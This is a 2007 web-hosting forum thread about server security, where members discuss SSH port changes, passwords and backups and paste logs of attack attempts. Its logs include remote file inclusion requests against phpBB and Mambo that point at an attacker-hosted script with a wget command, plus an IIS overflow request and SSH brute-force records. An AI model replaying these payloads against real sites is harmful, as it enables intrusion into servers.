[Webhosting] Security

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • willawake
    Super Modulator
    • Nov 2003
    • 8457
    • Greece

    #1

    [Webhosting] Security

    One of the first things to do for webserver security is to change the SSH port. This is the port where an admin can securely login to the webserver using a client like putty and access the shell in a text mode using secure telnet or SSH. Normally the port is 22 however it is best to change this to something above 30000 otherwise there are script kiddies running software which will try to login to your server via SSH as root on port 22. If you have appropriately chosen a good root password using a password generator then this is merely a nusiance load to your server. It can be stopped by changing the SSH port to anything above 30000.

    these are the kind of messages you would get in /var/log/messages before and after you change the port it is likely you wont see them

    Code:
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=h-67-102-88-164.nycmny83.covad.net user=root
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=h-67-102-88-164.nycmny83.covad.net user=mailman
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148-36-13-69.cust.propagation.net user=root
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=www.cs-schmid.de user=bin
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=p2936d3.tokynt01.ap.so-net.ne.jp user=mysql
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=lp
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=sshd
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=rpm
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=operator
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=games
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=adm
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=nobody
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=ftp
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=sync
    Last edited by willawake; 02-24-2007, 01:11 PM.
    capacitor lab yachtmati techmati
  • Topcat
    The Boss Stooge
    • Oct 2003
    • 16952
    • United States

    #2
    Re: [Webhosting] Security

    no point changing the port, any experienced intruder will find it. The key is not having soft passwords for ANYTHING accessible from the outside world.
    <--- Badcaps.net Founder

    Badcaps.net Services:

    Motherboard Repair Services

    ----------------------------------------------
    Badcaps.net Forum Members Folding Team
    http://folding.stanford.edu/
    Team : 49813
    Join in!!
    Team Stats

    Comment

    • willawake
      Super Modulator
      • Nov 2003
      • 8457
      • Greece

      #3
      Re: [Webhosting] Security

      that is the whole point though. the majority of hack attempts are just kids using tools. if you like to serve multiple requests per second for ssh login then dont change it. of course yes if they scan all ports of your ip then they can find it but that is a more determined scan. the kids are just quickly looking for any ip with ssh that they can login via root with dictionary words. yes the passwords for everything should be secure and certainly not dictionary words.

      the second type of easy hack is trying a specific exploit so they will look for an installation of an unsecure version of software whether wordpress, mambo, phbb etc and they have a tool which will detect the software version and apply the hack gaining them access to deface etc.

      this leads webmasters to think they are being personally targeted. but that is not the case, their lack of attention to updates has attracted the attention.

      here is an example of an opportunistic hack attempt

      Code:
      200.105.46.4 - - [03/Nov/2006:15:27:10 -0500] "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\
      now that is an IIS exploit but the thing is that i am running apache under linux..........
      capacitor lab yachtmati techmati

      Comment

      • willawake
        Super Modulator
        • Nov 2003
        • 8457
        • Greece

        #4
        Re: [Webhosting] Security

        if anyone can explain wtf this stuff is...

        Code:
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/PNphpBB2/includes/functions_admin.phpfunctions_admin.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forum/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        capacitor lab yachtmati techmati

        Comment

        • willawake
          Super Modulator
          • Nov 2003
          • 8457
          • Greece

          #5
          Re: [Webhosting] Security

          of course if you are personally targeted by an experienced hacker because of the high profile of the site or the content, then it is likely that unless you are very careful about security then it is likely that you are fucked and are going to need some good backups which are stored in a location not controlled by the server. thankfully these are otherwise rare incidents.........
          capacitor lab yachtmati techmati

          Comment

          • gonzo0815
            Badcaps Legend
            • Feb 2006
            • 1600

            #6
            Re: [Webhosting] Security

            Someone is oviousely trying to get a console opend by this url, probably some systems are vulnerable to this url, but only a rough asumption.

            Comment

            • Topcat
              The Boss Stooge
              • Oct 2003
              • 16952
              • United States

              #7
              Re: [Webhosting] Security

              Badcaps.net is fairly high profile, many attempts have been made.... I have the box locked down very nicely, hell only 5 ports are open.... Running on IIS, no major issues to report.... Apache on a win2k pro box is my favorite web server config tho...
              <--- Badcaps.net Founder

              Badcaps.net Services:

              Motherboard Repair Services

              ----------------------------------------------
              Badcaps.net Forum Members Folding Team
              http://folding.stanford.edu/
              Team : 49813
              Join in!!
              Team Stats

              Comment

              • willawake
                Super Modulator
                • Nov 2003
                • 8457
                • Greece

                #8
                Re: [Webhosting] Security

                i think they are trying mambo and phbb exploits. both i am not running.
                capacitor lab yachtmati techmati

                Comment

                • Topcat
                  The Boss Stooge
                  • Oct 2003
                  • 16952
                  • United States

                  #9
                  Re: [Webhosting] Security

                  Originally posted by willawake
                  i think they are trying mambo and phbb exploits. both i am not running.
                  phpbb by itself is an exploit.... Yes, you can tell from the commands that it's phpbb.... wonders what vb ones are out there.... lol
                  <--- Badcaps.net Founder

                  Badcaps.net Services:

                  Motherboard Repair Services

                  ----------------------------------------------
                  Badcaps.net Forum Members Folding Team
                  http://folding.stanford.edu/
                  Team : 49813
                  Join in!!
                  Team Stats

                  Comment

                  • willawake
                    Super Modulator
                    • Nov 2003
                    • 8457
                    • Greece

                    #10
                    Re: [Webhosting] Security

                    yes indeed. i was reading a while back a very sorry thread of many pages where a cheap host was apologising to his customers after one ran a not updated mambo and after exploit the entire server was fucked and also the offsite backups which the server controlled......were corrupted.......he was offering a good backup from a few months back.
                    capacitor lab yachtmati techmati

                    Comment

                    • Topcat
                      The Boss Stooge
                      • Oct 2003
                      • 16952
                      • United States

                      #11
                      Re: [Webhosting] Security

                      The key to running a good web server:

                      Think of backups like religion, worship a new backup daily. No matter how well you think you have your box secured, there's always a new exploit that hasn't been discovered yet. No OS is flawless, and if you happen to end up as some script kiddie's lab rat, you won't lose much (if anything at all).
                      <--- Badcaps.net Founder

                      Badcaps.net Services:

                      Motherboard Repair Services

                      ----------------------------------------------
                      Badcaps.net Forum Members Folding Team
                      http://folding.stanford.edu/
                      Team : 49813
                      Join in!!
                      Team Stats

                      Comment

                      • willawake
                        Super Modulator
                        • Nov 2003
                        • 8457
                        • Greece

                        #12
                        Re: [Webhosting] Security

                        yeah and in the beginning do a restore before you start to worship your backups
                        capacitor lab yachtmati techmati

                        Comment

                        • Rainbow
                          Badcaps Legend
                          • Aug 2005
                          • 1371

                          #13
                          Re: [Webhosting] Security

                          I know how to secure my ssh daemon
                          Code:
                          Feb 18 02:53:05 router sshd[19094]: Did not receive identification string from 211.176.61.119
                          Feb 18 02:57:02 router sshd[19095]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:02 router sshd[19095]: Failed password for invalid user root from 211.176.61.119 port 43318 ssh2
                          Feb 18 02:57:06 router sshd[19097]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:07 router sshd[19097]: Failed password for invalid user root from 211.176.61.119 port 43763 ssh2
                          Feb 18 02:57:11 router sshd[19099]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:11 router sshd[19099]: Failed password for invalid user root from 211.176.61.119 port 44226 ssh2
                          Feb 18 02:57:16 router sshd[19101]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:16 router sshd[19101]: Failed password for invalid user root from 211.176.61.119 port 44674 ssh2
                          Feb 18 02:57:21 router sshd[19103]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:21 router sshd[19103]: Failed password for invalid user root from 211.176.61.119 port 45131 ssh2
                          Feb 18 02:57:26 router sshd[19105]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:26 router sshd[19105]: Failed password for invalid user root from 211.176.61.119 port 45568 ssh2
                          Feb 18 02:57:31 router sshd[19107]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:31 router sshd[19107]: Failed password for invalid user root from 211.176.61.119 port 46008 ssh2
                          Feb 18 02:57:35 router sshd[19109]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:36 router sshd[19109]: Failed password for invalid user root from 211.176.61.119 port 46463 ssh2
                          Feb 18 02:57:40 router sshd[19111]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:40 router sshd[19111]: Failed password for invalid user root from 211.176.61.119 port 46916 ssh2
                          Feb 18 02:57:45 router sshd[19113]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:45 router sshd[19113]: Failed password for invalid user root from 211.176.61.119 port 47371 ssh2
                          Feb 18 02:57:50 router sshd[19115]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:50 router sshd[19115]: Failed password for invalid user root from 211.176.61.119 port 47818 ssh2
                          Feb 18 02:57:55 router sshd[19117]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:55 router sshd[19117]: Failed password for invalid user root from 211.176.61.119 port 48277 ssh2
                          Feb 18 02:58:00 router sshd[19119]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:00 router sshd[19119]: Failed password for invalid user root from 211.176.61.119 port 48717 ssh2
                          Feb 18 02:58:04 router sshd[19121]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:05 router sshd[19121]: Failed password for invalid user root from 211.176.61.119 port 49174 ssh2
                          Feb 18 02:58:09 router sshd[19123]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:09 router sshd[19123]: Failed password for invalid user root from 211.176.61.119 port 49610 ssh2
                          Feb 18 02:58:14 router sshd[19125]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:14 router sshd[19125]: Failed password for invalid user root from 211.176.61.119 port 50052 ssh2
                          Feb 18 02:58:19 router sshd[19127]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:19 router sshd[19127]: Failed password for invalid user root from 211.176.61.119 port 50505 ssh2
                          Feb 18 02:58:24 router sshd[19129]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:24 router sshd[19129]: Failed password for invalid user root from 211.176.61.119 port 50958 ssh2
                          Feb 18 02:58:29 router sshd[19131]: User root from 211.176.61.119 not allowed because not listed in AllowUsers

                          Comment

                          • willawake
                            Super Modulator
                            • Nov 2003
                            • 8457
                            • Greece

                            #14
                            Re: [Webhosting] Security

                            what is identification string? keys?
                            Last edited by willawake; 02-24-2007, 05:25 PM.
                            capacitor lab yachtmati techmati

                            Comment

                            • Tom41
                              Badcaps Veteran
                              • Oct 2005
                              • 336
                              • England

                              #15
                              Re: [Webhosting] Security

                              I have my web server locked down securely, I believe. The root password is unguessable (20 random characters, changed weekly) and I don't even have the telnetd, sshd or ftpd running! If I need to get something onto the web server, I have to go to the actual console and start up ftpd manually, remembering to stop it when I'm done. Or just burn the files I want to a CD-RW and put them on the server that way.

                              The only port on the server that's forwarded to the Internet is port 90 (for some reason, the ISP blocks incoming traffic to port 80 - perhaps to stop people getting into your router?).

                              Even so, I have had the server hacked twice. Without any ftpd or sshd running, and with a strong root password, I still got the web server's main page replaced with a hostile ActiveX control that would delete cmd.exe and command.com from any PC visiting (provided they were logged into an admin account). The second time was more of a script kiddy thing, a Javascript 'prank' that caused windows to bounce around the screen until you force terminated the browser.
                              How could it have been hacked? Exploit in Apache? Message board exploit giving you root shell access?

                              Also, I do see a lot of robots crawling my site and stopping when they see the robots.txt file . I've also seen occasional requests for things like /thisfiledoesnotexist - perhaps to see if you have a custom 404 page?
                              Last edited by Tom41; 02-24-2007, 05:40 PM.
                              You know there's something wrong when you open your PC and it has vented Rubycons...

                              Comment

                              • willawake
                                Super Modulator
                                • Nov 2003
                                • 8457
                                • Greece

                                #16
                                Re: [Webhosting] Security

                                your isp blocks port 80 cos they dont want people serving?

                                what web apps are you running on that. something get exploit
                                capacitor lab yachtmati techmati

                                Comment

                                Related Topics

                                Collapse

                                • dfear
                                  HP ELITEBOOK X360 1040 G7 - "power-on authentication" problems.
                                  by dfear
                                  HP ELITEBOOK X360 1040 G7 - "power-on authentication" problems.

                                  A customer dropped off a HP ELITEBOOK X360 1040 G7 with a "power-on authentication" problem.

                                  Customer says he didn't set this up. Neither password or fingerprint works.

                                  I have tried flashing:

                                  1) JBIOS1UH2
                                  with:
                                  a) RCUnlocker (by RethoricalCheese). Didn't do anything, beacause the chip is 32MB in size.
                                  b) HPUnlocker (by mazzif). Made a small change (changed: "00 00 00 00" to "FF FF FF FF".
                                  result: "power-on...
                                  05-17-2022, 05:31 AM
                                • Sus256
                                  HISENSE 65E7KQ PRO - no boot
                                  by Sus256
                                  Hi all!

                                  HISENSE 65E7KQ PRO
                                  RSAG7.820.13512 - chassis
                                  MT9618BAATAB - cpu
                                  RSAG7.820.12059 - power
                                  HD650Y3U77 - panel
                                  KLM8G1GETF - emmc

                                  The TV does not turn on, the standby indicator is on. All voltages are present.
                                  Emms is dead. Not readable, not detected.
                                  Replaced emmc.
                                  But with another dump there is no launch

                                  Terminal log

                                  UART
                                  <
                                  AC_ON
                                  RPMB key is not yet programmed

                                  HASH1_VERSION=0x00000000 64bit
                                  E-B
                                  FDE enabled
                                  layout pattern onebin by SAR7,0...
                                  06-01-2025, 02:11 AM
                                • ctroxtell
                                  Carrier HK50AA063 display controller common failure help
                                  by ctroxtell
                                  I've got a control display for a Carrier chiller that I'm trying to understand what the common failure with these boards are. This is the board in question https://www.supplyhouse.com/Carrier-...arquee-Display all of them seem to develop a failure with the up and down arrow buttons on the right side of the display, the esc and enter keys I've never seen fail. Once these boards are plugged in they run 24/7, you used to have to press extremely hard with the end of the blunt screwdriver and you could still get the arrows to work but now it has completely stopped working. The button...
                                  02-05-2025, 05:31 PM
                                • howardc64
                                  Vizio E55-F1 dark backlight zones. LED failure or Dimming Zone Driver?
                                  by howardc64
                                  Problem

                                  Fixing a dimming zone TV with LEDs not lighting up. Dimming zone circuit introduces added variable to diagnose LED and/or Dimming Zone Driver board? Some 1/2 rows of LEDs appears to be out in active dimming zone off AND some brightness flickering with active dimming zone high while playing changing video



                                  Model & Board Pics



                                  Conflicting Spec

                                  Vizio indicate this TV has 10 dimming zones. However, LED strips and Zoned light driver connector suggest 12

                                  https://www.shopjimmy.com/vizio-gj-2k1...
                                  10-10-2024, 01:16 PM
                                • sam_sam_sam
                                  Mitsubishi CNC switching power supply board dead / relay board bad diode failure
                                  by sam_sam_sam
                                  I was working on this CNC machine today found no keyboard functioning no control relay powering on
                                  The screen powered on and was giving an operation error but the manual was not very clear about what the error exactly was but with a little bit of troubleshooting and finding out that the control relays not powering on and no keyboard functions we narrowed down to this one switching power supply which of course does not have any indicator LED light they are on the keyboard interface/relay controller board

                                  Found shorted diodes on main controller relays there are 3 of them that...
                                  01-07-2023, 05:43 PM
                                • Loading...
                                • No more items.
                                Working...